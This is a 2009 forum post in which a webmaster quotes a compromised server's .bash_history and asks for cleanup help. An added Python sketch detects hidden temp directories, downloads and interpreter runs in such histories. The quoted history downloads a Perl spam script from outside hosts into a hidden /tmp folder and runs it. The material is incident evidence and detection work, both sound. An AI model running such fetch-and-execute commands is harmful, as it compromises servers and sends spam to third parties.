Msg#: 4013249 posted 2:15 am on Oct 26, 2009 (gmt 0)
Hello everyone, not sure if I should post this here or in the search forum. I have a new client that came to me because his site's rankings plummeted a year ago. The site is still indexed and I started checking for a server hack. The site is on a shared server and malware is detected on other sites within that server. I started checking files on the site line by line. In the .bash_history file I saw the following code:
cd /tmp
mkdir .dc
cd .dc
wget infbr.iespana.es/enviar.pl
echo email@example.com > rev.txt
perl enviar.pl rev.txt sudfhsd sduhf usdhf
wget [topmagia.ru...]
wget [topmagia.ru...]
perl enviar.pl novaboa.txt firstname.lastname@example.org "O carteiro enviou este cartao para ti" ocarteiro.txt
Which fits the profile of spam. I plan to call the hosting company tomorrow and request the site be moved to another server.
My question is, can I remove the content of this file (what and how much should I delete?). And are there any suggestions on where else I should look to see what this code has done?
I am not a whiz when it comes to server-side files. Any help would be greatly appreciated!
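The history quoted in the post shows a recognizable sequence: a hidden directory made under /tmp, a script downloaded into it, then an interpreter run on that script. As an added example that is not part of the original post, this Python sketch flags that sequence in a history file; the function name `triage`, the command lists and the sample lines (with a placeholder host) are assumptions constructed for illustration.

```python
import shlex

# Constructed sample modelled on the history quoted in the post
# (the download host is replaced with an example.invalid placeholder).
SAMPLE_HISTORY = """\
ls -la
cd /tmp
mkdir .dc
cd .dc
wget example.invalid/enviar.pl
echo someone@example.invalid > rev.txt
perl enviar.pl rev.txt
"""

FETCHERS = {"wget", "curl", "fetch", "lwp-download"}
INTERPRETERS = {"perl", "python", "php", "sh", "bash"}
TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def triage(history_text):
    """Return (line_no, reason, command) findings for a bash history dump."""
    findings, cwd, downloaded = [], "~", set()
    for no, line in enumerate(history_text.splitlines(), 1):
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            argv = line.split()
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if cmd == "cd" and args:
            # History records no working directory, so follow cd to approximate it.
            cwd = args[0] if args[0].startswith("/") else cwd.rstrip("/") + "/" + args[0]
        elif cmd == "mkdir" and cwd.startswith(TEMP_DIRS):
            if any(a.startswith(".") for a in args):
                findings.append((no, "hidden directory created under temp dir", line))
        elif cmd in FETCHERS:
            for a in args:
                if not a.startswith("-"):  # remember the file name each URL saves as
                    downloaded.add(a.rstrip("/").rsplit("/", 1)[-1])
            if cwd.startswith(TEMP_DIRS):
                findings.append((no, "download into temp dir", line))
        elif cmd in INTERPRETERS and args and args[0] in downloaded:
            findings.append((no, "interpreter run on downloaded file", line))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_HISTORY):
        print(finding)
```

Shell history is writable by the account that produced it, so an empty result does not show that the account is clean.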